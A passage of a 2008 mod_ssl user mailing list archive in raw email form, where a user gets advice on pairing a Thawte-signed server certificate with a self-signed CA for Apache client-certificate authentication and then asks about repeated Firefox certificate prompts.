erver.key,=0Aapache_server.crt , thawte root cert.=0A=0ABest regards=0A=0AW=
izkidnono=0A=E2=80=93=C5=93=E2=80=A6=C3=A2'=C2=B5=C3=AA=C3=9Fi=C3=87=C2=AD =
=C3=AA^=EF=BF=BD$=E2=80=B9=C5=A1=E2=80=A1l=C2=B2\0=C3=82j=C2=B2=C3=89h=C2=
=AE,z=C2=B4=C2=AE=C2=A6=C5=A1+=C2=B4=C3=86=C2=A2=E2=80=93)=C3=A0.+-=C5=A1=
=E2=80=A1l=C2=B2[=C2=ACz=C2=BB&=C2=A1=C3=9B,=E2=80=93=C5=A0=C3=A0=C3=ABh=E2=
=84=A2=C2=AB^t=C2=B8=C2=AC=C2=B4=C3=86=C2=A7j=C2=AB=E2=84=A2=C2=A8=C3=A8=C2=
=AD=C3=9A&=C2=A2j=C2=B2=C3=89h=C2=AE=0A=0A=0A      
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 23 14:53:16 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EB11A14DA36; Tue, 23 Sep 2008 14:53:16 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail47.e.nsc.no (mail47.e.nsc.no [193.213.115.47])
	by master.modssl.org (Postfix) with ESMTP id 0AF9114D838
	for ; Tue, 23 Sep 2008 14:53:15 +0200 (CEST)
Received: from mailtilmeg.com ([62.92.2.220])
	by mail47.nsc.no (8.13.8/8.13.5) with ESMTP id m8NCqAg0021129
	for ; Tue, 23 Sep 2008 14:52:11 +0200 (MEST)
Received: from  [193.213.27.35] by mailtilmeg.com with Web
  (ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.9.5)); Tue, 23 Sep 2008 14:39:16 +0200
From: Jan Stian Gabrielli 
To: 
Subject: Re: Can i use CA signed cert to create client authentication certificates ?
Mime-Version: 1.0
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: base64
Message-ID: <80erbynrtviwxjj.230920081439@mailtilmeg.com>
Date: Tue, 23 Sep 2008 14:39:16 +0200
X-ArGoMail-Authenticated: stian@mailtilmeg.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan Stian Gabrielli 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

T2suIFRoaXMgc2VlbXMgbGlrZSBhIHZpYWJsZSBzb2x1dGlvbi4NCkllLg0KSSB1c2UgYW4gYXBw
cm92ZWQgQ0Egc2lnbmVkIGNlcnQgdG8gdmVyaWZ5IHRoZSBzaXRlIGF1aHRlbnRpc2l0eSwgYW5k
IGkgdXNlIGEgc2VsZnNpZ25lZCBDQSByb290IGZvciBjbGllbnQgY2VydGlmaWNhdGVzLg0KDQpD
YW4geW91IHBvaW50IG1lIGluIGEgZGlyZWN0aW9uIG9mIGhvdyBpIG1ha2UgdGhpcyB3b3JrIGlu
IGFwYWNoZSA/Lg0KSSBhbHJlYWR5IGhhdmUgYSBzZXR1cCB3aXRoIGEgU2VsZnNpZ25lZCBDQSB3
b3JraW5nIGZvciBjbGllbnQgY2VydGlmaWNhdGVzLg0KDQpDcmVhdGVlZCBTZWxmU2lnbmVkQ0EN
CnwtLT5DcmVhdGUgYW5kIFNpZ24gQXBhY2hlIENlcnQgZnJvbSBTZWxmU2lnbmVkIENBDQp8LS0+
Q3JlYXRlIGFuZCBTaWduIENsaWVudCBDZXJ0IGZyb20gU2VsZlNpZ25lZCBDQQ0KDQpIb3cgZG8g
SSBpbmNvcnBvcmF0ZSB0aGlzIHdpdGggYSBDQSAodGhhd3RlKSBzaWduZWQgd2Vic2VydmVyIGNl
cnRpZmljYXRlID8uDQoNCkJlc3QgcmVnYXJkcw0KDQpXaXpraWRub25vDQoNCk9yaWdpbmFsIE1l
c3NhZ2UgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NClNvdW5kcyBsaWtlIHlvdXIgdHJ5aW5nIHRv
IHVzZSB0aGUgdGhhd3RlIGFwYWNoZSBjZXJ0IHRvIHNpZ24geW91ciBjbGllbnQgY2VydHM/IFRo
ZSB0aGF3dGUgY2VydCB3b24ndCBoYXZlIHRoZSByaWdodCBhdHRyaWJ1dGVzIHRvIHNpZ24gYSBj
bGllbnQgY2VydCBhbmQgdGhlbiB0cnkgdG8gdXNlIGl0Lg0KDQpZb3UgY291bGQgdXNlIHlvdXIg
Q0EgZm9yIGNsaWVudCBjZXJ0cyBhbmQgVGhhd3RlIGZvciB0aGUgc2VydmVyIGNlcnQuDQoNClJl
Z2FyZHMNCk1hdHQNCg0KDQoNCi0tLS0tIE9yaWdpbmFsIE1lc3NhZ2UgLS0tLQ0KRnJvbTogSmFu
IFN0aWFuIEdhYnJpZWxsaSA8c3RpYW5AbWFpbHRpbG1lZy5jb20+DQpUbzogbW9kc3NsLXVzZXJz
QG1vZHNzbC5vcmcNClNlbnQ6IE1vbmRheSwgU2VwdGVtYmVyIDIyLCAyMDA4IDc6NTQ6MzcgUE0N
ClN1YmplY3Q6IENhbiBpIHVzZSBDQSBzaWduZWQgY2VydCB0byBjcmVhdGUgY2xpZW50IGF1dGhl
bnRpY2F0aW9uIGNlcnRpZmljYXRlcyA/DQoNCkkgYW0gdHJ5aW5nIHRvIHNldCB1cCBhcGFjaGUg
d2l0aCBtb2Rfc3NsICwgYW5kIEkgaGF2ZSBpdCB3b3JraW5nIHdpdGggYQ0KU2VsZiBTaWduZWQg
Q0EuDQpCdXQgaSBjYW4gbm90IGdldCBpdCB0byB3b3JrIHdpdGggYSBjZXJ0IGNyZWF0ZWQgYnkg
dGhhd3RlLmNvbS4NCg0KRG9lcyBhbnlvbmUga25vdyBpZiBpdCBpcyBwb3NzaWJsZSB0byBkbyB0
aGlzIHdpdGggYSBjcnQgc2lnbmVkIGJ5IGEgInRoaXJkIg0KcGFydHkgd2hlcmUgb25lIGRvZXMg
bm90IGhhdmUgYWNjZXNzIHRvIHRoZWlyIHJvb3QgY2Ega2V5ID8uLg0KDQpJZS4NCg0KSSBoYXZl
IGdlbmVyYXRlZCBhIDogYXBhY2hlX3NlcnZlci5rZXkgbWFkZSBhIGFwYWNoZV9zZXJ2ZXIuLmNz
ciBhbmQgc2VudA0KdGhpcyBmb3Igc2lnbmluZyBieSB0aGF3dGUuY29tDQpSZWNpdmVkIGEgYXBh
Y2hlX3NlcnZlci5jcnQNCg0KQ3JlYXRlZCBhIGNsaWVudC5rZXkgYW5kIGEgY2xpZW50LmNzcg0K
U2lnbmVkIGl0IHdpdGggbXkgYXBhY2hlX3NlcnZlci5rZXkgYW5kIGFwYWNoZV9zZXJ2ZXIuY3J0
DQoNCkNvbnZlcnRlZCB0aGUgY2xpZW50LmtleSxjcnQgdG8gYSBwa2NzMTIgZmlsZSBhbmQgaW1w
b3J0ZWQgdGhpcyBpbnRvIG15DQpicm93c2VyIGJ1dCBpIGNhbiBub3QgbWFrZSB0aGluZ3Mgd29y
ay4NCg0KU1NMIHdvcmtzIGZpbmUgb24gdGhlIHNlcnZlciBvbiBwYWdlcyB0aGF0IGRvZXMgbm90
IHJlcXVpcmUgU1NMIGNsaWVudCBhdXRoLg0KDQpBIEkgc3RhdGVkIGVhcmxpZXIsIElUIHdvcmtz
IHdoZW4gSSBjcmVhdGUgYW5kIHNlbGYgc2lnbiBhIENBLCBidXQgSSBjYW50DQptYWtlIGl0IHdv
cmsgd2hlbiBJIHVzZSBhIDNyZCBwYXJ0eSBDQSBhbmQgb25seSBoYXZlIGFwYWNoZV9zZXJ2ZXIu
a2V5LA0KYXBhY2hlX3NlcnZlci5jcnQgLCB0aGF3dGUgcm9vdCBjZXJ0Lg0KDQpCZXN0IHJlZ2Fy
ZHMNCg0KV2l6a2lkbm9ubw0K4oCTxZPigKbDoifCtcOqw59pw4fCrSDDql7vv70k4oC5xaHigKFs
wrJcMMOCasKyw4lowq4sesK0wq7CpsWhK8K0w4bCouKAkynDoC4rLcWh4oChbMKyW8KsesK7JsKh
w5ss4oCTxaDDoMOraOKEosKrXnTCuMKswrTDhsKnasKr4oSiwqjDqMKtw5omwqJqwrLDiWjCrg0K
DQoNCiAgICAgIA0KX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fXw0KQXBhY2hlIEludGVyZmFjZSB0byBPcGVuU1NMICht
b2Rfc3NsKSAgICAgICAgICAgICAgICAgICB3d3cubW9kc3NsLm9yZw0KVXNlciBTdXBwb3J0IE1h
aWxpbmcgTGlzdCAgICAgICAgICAgICAgICAgICAgICBtb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZw0K
QXV0b21hdGVkIExpc3QgTWFuYWdlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBtYWpvcmRv
bW9AbW9kc3NsLm9yZw0K

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 23 20:37:56 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9075014DA33; Tue, 23 Sep 2008 20:37:56 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from web58307.mail.re3.yahoo.com (web58307.mail.re3.yahoo.com [68.142.236.160])
	by master.modssl.org (Postfix) with SMTP id 0E0D714D838
	for ; Tue, 23 Sep 2008 20:37:55 +0200 (CEST)
Received: (qmail 95740 invoked by uid 60001); 23 Sep 2008 18:36:51 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=3ipOZDd+GljSZKpxVfnT8dcZVE0OKIOTOwcJfOZPcN6kotJGHAe5raXr0g/Zg0ycEtFs/6q7vO3VSAxG/czteJT9UQ+EJyjDKZrhWT8Ie6aK7WlO7DOcnLuuBVqClMRTgRvvgKtBcDgCC1HZVIzDF6FvWt/LoeiyIFE0NOWQkzE=;
X-YMail-OSG: 0P3Wh0kVM1klwoyAlAm81pat6L4z7nmX5pOG81vg3wBudiw_nsbHGCf99RuTLbb50g--
Received: from [90.201.202.99] by web58307.mail.re3.yahoo.com via HTTP; Tue, 23 Sep 2008 11:36:51 PDT
X-Mailer: YahooMailRC/1096.28 YahooMailWebService/0.7.218.2
Date: Tue, 23 Sep 2008 11:36:51 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: Can i use CA signed cert to create client authentication certificates ?
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Message-ID: <706810.95724.qm@web58307.mail.re3.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,=0A=0ABasically...=0A=0ASSLCACertificateFile SelfSignedCA Root Cert (pub=
lic part)=0ASSLVerifyClient require or optional=0ASSLVerifyDepth 1 (default=
)=0A=0Aand have the setup from the Thwate cert as per normal for the server=
 cert.=0A=0ARegards=0AMatt=0A=0A----- Original Message ----=0AFrom: Jan Sti=
an Gabrielli =0ATo: modssl-users@modssl.org=0ASent: T=
uesday, September 23, 2008 1:39:16 PM=0ASubject: Re: Can i use CA signed ce=
rt to create client authentication certificates ?=0A=0AOk. This seems like =
a viable solution.=0AIe.=0AI use an approved CA signed cert to verify the s=
ite auhtentisity, and i use a selfsigned CA root for client certificates.=
=0A=0ACan you point me in a direction of how i make this work in apache ?.=
=0AI already have a setup with a Selfsigned CA working for client certifica=
tes.=0A=0ACreateed SelfSignedCA=0A|-->Create and Sign Apache Cert from Self=
Signed CA=0A|-->Create and Sign Client Cert from SelfSigned CA=0A=0AHow do =
I incorporate this with a CA (thawte) signed webserver certificate ?.=0A=0A=
Best regards=0A=0AWizkidnono=0A=0AOriginal Message -----------------------=
=0ASounds like your trying to use the thawte apache cert to sign your clien=
t certs? The thawte cert won't have the right attributes to sign a client c=
ert and then try to use it.=0A=0AYou could use your CA for client certs and=
 Thawte for the server cert.=0A=0ARegards=0AMatt=0A=0A=0A=0A----- Original =
Message ----=0AFrom: Jan Stian Gabrielli =0ATo: modss=
l-users@modssl.org=0ASent: Monday, September 22, 2008 7:54:37 PM=0ASubject:=
 Can i use CA signed cert to create client authentication certificates ?=0A=
=0AI am trying to set up apache with mod_ssl , and I have it working with a=
=0ASelf Signed CA.=0ABut i can not get it to work with a cert created by th=
awte.com.=0A=0ADoes anyone know if it is possible to do this with a crt sig=
ned by a "third"=0Aparty where one does not have access to their root ca ke=
y ?..=0A=0AIe.=0A=0AI have generated a : apache_server.key made a apache_se=
rver..csr and sent=0Athis for signing by thawte.com=0ARecived a apache_serv=
er.crt=0A=0ACreated a client.key and a client.csr=0ASigned it with my apach=
e_server.key and apache_server.crt=0A=0AConverted the client.key,crt to a p=
kcs12 file and imported this into my=0Abrowser but i can not make things wo=
rk.=0A=0ASSL works fine on the server on pages that does not require SSL cl=
ient auth.=0A=0AA I stated earlier, IT works when I create and self sign a =
CA, but I cant=0Amake it work when I use a 3rd party CA and only have apach=
e_server.key,=0Aapache_server.crt , thawte root cert.=0A=0ABest regards=0A=
=0AWizkidnono=0A=C3=A2=E2=82=AC=E2=80=9C=C3=85=E2=80=9C=C3=A2=E2=82=AC=C2=
=A6=C3=83=C2=A2'=C3=82=C2=B5=C3=83=C2=AA=C3=83=C5=B8i=C3=83=E2=80=A1=C3=82=
=C2=AD =C3=83=C2=AA^=C3=AF=C2=BF=C2=BD$=C3=A2=E2=82=AC=C2=B9=C3=85=C2=A1=C3=
=A2=E2=82=AC=C2=A1l=C3=82=C2=B2\0=C3=83=E2=80=9Aj=C3=82=C2=B2=C3=83=E2=80=
=B0h=C3=82=C2=AE,z=C3=82=C2=B4=C3=82=C2=AE=C3=82=C2=A6=C3=85=C2=A1+=C3=82=
=C2=B4=C3=83=E2=80=A0=C3=82=C2=A2=C3=A2=E2=82=AC=E2=80=9C)=C3=83 .+-=C3=85=
=C2=A1=C3=A2=E2=82=AC=C2=A1l=C3=82=C2=B2[=C3=82=C2=ACz=C3=82=C2=BB&=C3=82=
=C2=A1=C3=83=E2=80=BA,=C3=A2=E2=82=AC=E2=80=9C=C3=85 =C3=83 =C3=83=C2=ABh=
=C3=A2=E2=80=9E=C2=A2=C3=82=C2=AB^t=C3=82=C2=B8=C3=82=C2=AC=C3=82=C2=B4=C3=
=83=E2=80=A0=C3=82=C2=A7j=C3=82=C2=AB=C3=A2=E2=80=9E=C2=A2=C3=82=C2=A8=C3=
=83=C2=A8=C3=82=C2=AD=C3=83=C5=A1&=C3=82=C2=A2j=C3=82=C2=B2=C3=83=E2=80=B0h=
=C3=82=C2=AE=0A=0A=0A      =0A_____________________________________________=
_________________________=0AApache Interface to OpenSSL (mod_ssl)          =
        www.modssl.org=0AUser Support Mailing List                      mod=
ssl-users@modssl.org=0AAutomated List Manager                            ma=
jordomo@modssl.org=0A=E2=80=93=C5=93=E2=80=A6=C3=A2'=C2=B5=C3=AA=C3=9Fi=C3=
=87=C2=AD =C3=AA^=EF=BF=BD$=E2=80=B9=C5=A1=E2=80=A1l=C2=B2\0=C3=82j=C2=B2=
=C3=89h=C2=AE,z=C2=B4=C2=AE=C2=A6=C5=A1+=C2=B4=C3=86=C2=A2=E2=80=93)=C3=A0.=
+-=C5=A1=E2=80=A1l=C2=B2[=C2=ACz=C2=BB&=C2=A1=C3=9B,=E2=80=93=C5=A0=C3=A0=
=C3=ABh=E2=84=A2=C2=AB^t=C2=B8=C2=AC=C2=B4=C3=86=C2=A7j=C2=AB=E2=84=A2=C2=
=A8=C3=A8=C2=AD=C3=9A&=C2=A2j=C2=B2=C3=89h=C2=AE=0A=0A=0A      
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 25 10:50:29 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 63B5D14D885; Thu, 25 Sep 2008 10:50:29 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail42.e.nsc.no (mail42.e.nsc.no [193.213.115.42])
	by master.modssl.org (Postfix) with ESMTP id 19D7414D82E
	for ; Thu, 25 Sep 2008 10:50:28 +0200 (CEST)
Received: from mailtilmeg.com ([62.92.2.220])
	by mail42.nsc.no (8.13.8/8.13.5) with ESMTP id m8P8nNYZ004462
	for ; Thu, 25 Sep 2008 10:49:24 +0200 (MEST)
Received: from  [134.47.109.185] by mailtilmeg.com with Web
  (ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.9.5)); Thu, 25 Sep 2008 10:37:00 +0200
From: Jan Stian Gabrielli 
To: 
Subject: Re: Can i use CA signed cert to create client authentication certificates ?
Mime-Version: 1.0
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: base64
Message-ID: <55lhsm7tm1tqjor.250920081037@mailtilmeg.com>
Date: Thu, 25 Sep 2008 10:37:00 +0200
X-ArGoMail-Authenticated: stian@mailtilmeg.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan Stian Gabrielli 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

VGhhbmsgeW91IHZlcnkgbXVjaCBNYXR0IC4NClRoYXQgc29sdmVkIGl0IDopLg0KDQpJIG5vdyBo
YXZlICJDbGllbnQgQ2VydGlmaWNhdGUgQXV0aGVudGljYXRpb24iIHdvcmtpbmcgd2l0aCBhIENB
IHNpZ25lZCBjZXJ0aWZpY2F0ZSBhbmQgYSBTZWxmIFNpZ25lZCBDQSB3aGljaCBpbiB0dXJuIHNp
Z25zIGNsaWVudCBjZXJ0cy4NCg0KSWYgaSBjYW4gb25seSBhc2sgZm9yIGEgYml0IG1vcmUgYWR2
aWNlIHJlZ2FyZGluZyB0aGlzIHNldHVwID8uDQpBbHRob3VnaCBJIHRoaW5rIHRoaXMgcHJvYmxl
bSBtaWdodCBiZSBGaXJlZm94IHNwZWNpZmljIEknbSBob3BpbmcgZm9yIHNvbWUgYWR2aWNlIGhl
cmUuIA0KDQpJbnRlcm5ldCBFeHBsb3JlciBoYW5kbGVzIHRoZSBjbGllbnQgY2VydGlmaWNhdGVz
IGZpbmUsIHByb21wdHMgbWUgdG8gc2VsZWN0IGNlcnRpZmljYXRlIG9uIGNvbm5lY3Rpb24gdG8g
dGhlIHNpdGUgYW5kIGJhc2ljYWxseSBqdXN0IHdvcmtzIGFmdGVyIHRoYXQuLg0KDQpCdXQgd2hl
biBGaXJlZm94IGlzIHNldCB0byAiQXNrIG1lIGV2ZXJ5IHRpbWUiIGluc3RlYWQgb2YgImF1dG8g
c2VsZWN0IGNsaWVudCBjZXJ0aWZpY2F0ZSIgSSBrZWVwIGdldHRpbmcgdGhlIHNlbGVjdCBjZXJ0
aWZpY2F0ZSBwb3AgdXAgc2V2ZXJhbChtdWx0aXBsZSkgdGltZXMgcGVyIHBhZ2UgcmVxdWVzdC9s
b2FkIGZyb20gdGhlIFNTTCBzZWN1cmVkIEFwYWNoZSBzZXJ2ZXIuDQpUaGVyZSBpcyBvbmx5IG9u
ZSBjZXJ0aWZpY2F0ZSBpbiB0aGUgc2VsZWN0IGZyb20gZGlhbG9nLCBidXQgaXQga2VlcHMgcHJv
bXB0aW5nIG1lIGFuZCBJIGNhbiBzZWUgaXQgbG9hZGluZyAib25lIiBhbmQgIm9uZSIgaXRlbShp
bWFnZSkgb24gdGhlIHdlYnNpdGUuDQpJZiBpIHN3aXRjaCB0byAiQXV0byBzZWxlY3QgY2VydGlm
aWNhdGUiIGl0IHdvcmtzLiBCdXQgaXQgd291bGQgYmUgbmljZSBub3QgaGF2aW5nIHRoZSBicm93
c2VyIHByZXNlbnQgdGhlIGNlcnRpZmljYXRlIHdpdGhvdXQgaXQgYmVpbmcgdGhlIHVzZXJzIGNo
b2ljZS4gQW5kIGhvbmVzdGx5LCBjaG9vc2luZyBpdCBvbmNlIHBlciBzZXNzaW9uIHBlciBzaXRl
IHNob3VsZCBiZSBzdWZmaWNpZW50DQogDQpJIHNob3VsZCBwcm9iYWJseSBtZW50aW9uIHRoYXQg
dGhlIHBhZ2Ugc2VydmVkIHVwIGlzIGJlaGluZCBhIG1vZF9wcm94eSBtb2R1bGUuIEJ1dCB0aGlz
IGNvbnRlbnQgc2hvdWxkIG5vdCBkaWZmZXIgZm9yIEZpcmVmb3gsIGFuZCBjZXJ0aWZpY2F0ZSBz
ZWxlY3Rpb24uIE9yIGRvZXMgdGhlIG1vZF9zc2wgbW9kdWxlIHByb21wdCBmb3IgYSBjbGllbnQg
Y2VydGlmaWNhdGUgZm9yIGVhY2ggaXRlbSBsb2FkZWQgPw0KDQpJIGhhdmUgZ29vZ2xlZCB0aGlz
IGJ1dCBjYW4ndCBmaW5kIGFueSBnb29kIGFuc3dlcnMuDQpTb21lIHNheSBpdCBpcyBiZWNhdXNl
IG9mIGltYWdlIG9iamVjdHMgbG9hZGluZy4gYnV0IHdoeS4gDQogDQpCZXN0IHJlZ2FyZHMNCg0K
SmFuIFN0aWFuIEdhYnJpZWxsaQ0KDQpPcmlnaW5hbCBNZXNzYWdlIC0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tDQpIaSwNCg0KQmFzaWNhbGx5Li4uDQoNClNTTENBQ2VydGlmaWNhdGVGaWxlIFNlbGZT
aWduZWRDQSBSb290IENlcnQgKHB1YmxpYyBwYXJ0KQ0KU1NMVmVyaWZ5Q2xpZW50IHJlcXVpcmUg
b3Igb3B0aW9uYWwNClNTTFZlcmlmeURlcHRoIDEgKGRlZmF1bHQpDQoNCmFuZCBoYXZlIHRoZSBz
ZXR1cCBmcm9tIHRoZSBUaHdhdGUgY2VydCBhcyBwZXIgbm9ybWFsIGZvciB0aGUgc2VydmVyIGNl
cnQuDQoNClJlZ2FyZHMNCk1hdHQNCg0KLS0tLS0gT3JpZ2luYWwgTWVzc2FnZSAtLS0tDQpGcm9t
OiBKYW4gU3RpYW4gR2FicmllbGxpIDxzdGlhbkBtYWlsdGlsbWVnLmNvbT4NClRvOiBtb2Rzc2wt
dXNlcnNAbW9kc3NsLm9yZw0KU2VudDogVHVlc2RheSwgU2VwdGVtYmVyIDIzLCAyMDA4IDE6Mzk6
MTYgUE0NClN1YmplY3Q6IFJlOiBDYW4gaSB1c2UgQ0Egc2lnbmVkIGNlcnQgdG8gY3JlYXRlIGNs
aWVudCBhdXRoZW50aWNhdGlvbiBjZXJ0aWZpY2F0ZXMgPw0KDQpPay4gVGhpcyBzZWVtcyBsaWtl
IGEgdmlhYmxlIHNvbHV0aW9uLg0KSWUuDQpJIHVzZSBhbiBhcHByb3ZlZCBDQSBzaWduZWQgY2Vy
dCB0byB2ZXJpZnkgdGhlIHNpdGUgYXVodGVudGlzaXR5LCBhbmQgaSB1c2UgYSBzZWxmc2lnbmVk
IENBIHJvb3QgZm9yIGNsaWVudCBjZXJ0aWZpY2F0ZXMuDQoNCkNhbiB5b3UgcG9pbnQgbWUgaW4g
YSBkaXJlY3Rpb24gb2YgaG93IGkgbWFrZSB0aGlzIHdvcmsgaW4gYXBhY2hlID8uDQpJIGFscmVh
ZHkgaGF2ZSBhIHNldHVwIHdpdGggYSBTZWxmc2lnbmVkIENBIHdvcmtpbmcgZm9yIGNsaWVudCBj
ZXJ0aWZpY2F0ZXMuDQoNCkNyZWF0ZWVkIFNlbGZTaWduZWRDQQ0KfC0tPkNyZWF0ZSBhbmQgU2ln
biBBcGFjaGUgQ2VydCBmcm9tIFNlbGZTaWduZWQgQ0ENCnwtLT5DcmVhdGUgYW5kIFNpZ24gQ2xp
ZW50IENlcnQgZnJvbSBTZWxmU2lnbmVkIENBDQoNCkhvdyBkbyBJIGluY29ycG9yYXRlIHRoaXMg
d2l0aCBhIENBICh0aGF3dGUpIHNpZ25lZCB3ZWJzZXJ2ZXIgY2VydGlmaWNhdGUgPy4NCg0KQmVz
dCByZWdhcmRzDQoNCldpemtpZG5vbm8NCg0KT3JpZ2luYWwgTWVzc2FnZSAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KU291bmRzIGxpa2UgeW91ciB0cnlpbmcgdG8gdXNlIHRoZSB0aGF3dGUgYXBh
Y2hlIGNlcnQgdG8gc2lnbiB5b3VyIGNsaWVudCBjZXJ0cz8gVGhlIHRoYXd0ZSBjZXJ0IHdvbid0
IGhhdmUgdGhlIHJpZ2h0IGF0dHJpYnV0ZXMgdG8gc2lnbiBhIGNsaWVudCBjZXJ0IGFuZCB0aGVu
IHRyeSB0byB1c2UgaXQuDQoNCllvdSBjb3VsZCB1c2UgeW91ciBDQSBmb3IgY2xpZW50IGNlcnRz
IGFuZCBUaGF3dGUgZm9yIHRoZSBzZXJ2ZXIgY2VydC4NCg0KUmVnYXJkcw0KTWF0dA0KDQoNCg0K
LS0tLS0gT3JpZ2luYWwgTWVzc2FnZSAtLS0tDQpGcm9tOiBKYW4gU3RpYW4gR2FicmllbGxpIDxz
dGlhbkBtYWlsdGlsbWVnLmNvbT4NClRvOiBtb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZw0KU2VudDog
TW9uZGF5LCBTZXB0ZW1iZXIgMjIsIDIwMDggNzo1NDozNyBQTQ0KU3ViamVjdDogQ2FuIGkgdXNl
IENBIHNpZ25lZCBjZXJ0IHRvIGNyZWF0ZSBjbGllbnQgYXV0aGVudGljYXRpb24gY2VydGlmaWNh
dGVzID8NCg0KSSBhbSB0cnlpbmcgdG8gc2V0IHVwIGFwYWNoZSB3aXRoIG1vZF9zc2wgLCBhbmQg
SSBoYXZlIGl0IHdvcmtpbmcgd2l0aCBhDQpTZWxmIFNpZ25lZCBDQS4NCkJ1dCBpIGNhbiBub3Qg
Z2V0IGl0IHRvIHdvcmsgd2l0aCBhIGNlcnQgY3JlYXRlZCBieSB0aGF3dGUuY29tLg0KDQpEb2Vz
IGFueW9uZSBrbm93IGlmIGl0IGlzIHBvc3NpYmxlIHRvIGRvIHRoaXMgd2l0aCBhIGNydCBzaWdu
ZWQgYnkgYSAidGhpcmQiDQpwYXJ0eSB3aGVyZSBvbmUgZG9lcyBub3QgaGF2ZSBhY2Nlc3MgdG8g
dGhlaXIgcm9vdCBjYSBrZXkgPy4uDQoNCkllLg0KDQpJIGhhdmUgZ2VuZXJhdGVkIGEgOiBhcGFj
aGVfc2VydmVyLmtleSBtYWRlIGEgYXBhY2hlX3NlcnZlci4uY3NyIGFuZCBzZW50DQp0aGlzIGZv
ciBzaWduaW5nIGJ5IHRoYXd0ZS5jb20NClJlY2l2ZWQgYSBhcGFjaGVfc2VydmVyLmNydA0KDQpD
cmVhdGVkIGEgY2xpZW50LmtleSBhbmQgYSBjbGllbnQuY3NyDQpTaWduZWQgaXQgd2l0aCBteSBh
cGFjaGVfc2VydmVyLmtleSBhbmQgYXBhY2hlX3NlcnZlci5jcnQNCg0KQ29udmVydGVkIHRoZSBj
bGllbnQua2V5LGNydCB0byBhIHBrY3MxMiBmaWxlIGFuZCBpbXBvcnRlZCB0aGlzIGludG8gbXkN
CmJyb3dzZXIgYnV0IGkgY2FuIG5vdCBtYWtlIHRoaW5ncyB3b3JrLg0KDQpTU0wgd29ya3MgZmlu
ZSBvbiB0aGUgc2VydmVyIG9uIHBhZ2VzIHRoYXQgZG9lcyBub3QgcmVxdWlyZSBTU0wgY2xpZW50
IGF1dGguDQoNCkEgSSBzdGF0ZWQgZWFybGllciwgSVQgd29ya3Mgd2hlbiBJIGNyZWF0ZSBhbmQg
c2VsZiBzaWduIGEgQ0EsIGJ1dCBJIGNhbnQNCm1ha2UgaXQgd29yayB3aGVuIEkgdXNlIGEgM3Jk
IHBhcnR5IENBIGFuZCBvbmx5IGhhdmUgYXBhY2hlX3NlcnZlci5rZXksDQphcGFjaGVfc2VydmVy
LmNydCAsIHRoYXd0ZSByb290IGNlcnQuDQoNCkJlc3QgcmVnYXJkcw0KDQpXaXpraWRub25vDQrD
ouKCrOKAnMOF4oCcw6LigqzCpsODwqInw4LCtcODwqrDg8W4acOD4oChw4LCrSDDg8KqXsOvwr/C
vSTDouKCrMK5w4XCocOi4oKswqFsw4LCslwww4PigJpqw4LCssOD4oCwaMOCwq4sesOCwrTDgsKu
w4LCpsOFwqErw4LCtMOD4oCgw4LCosOi4oKs4oCcKcODIC4rLcOFwqHDouKCrMKhbMOCwrJbw4LC
rHrDgsK7JsOCwqHDg+KAuizDouKCrOKAnMOFIMODIMODwqtow6LigJ7CosOCwqtedMOCwrjDgsKs
w4LCtMOD4oCgw4LCp2rDgsKrw6LigJ7CosOCwqjDg8Kow4LCrcODxaEmw4LComrDgsKyw4PigLBo
w4LCrg0KDQoNCiAgICAgIA0KX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fXw0KQXBhY2hlIEludGVyZmFjZSB0byBPcGVu
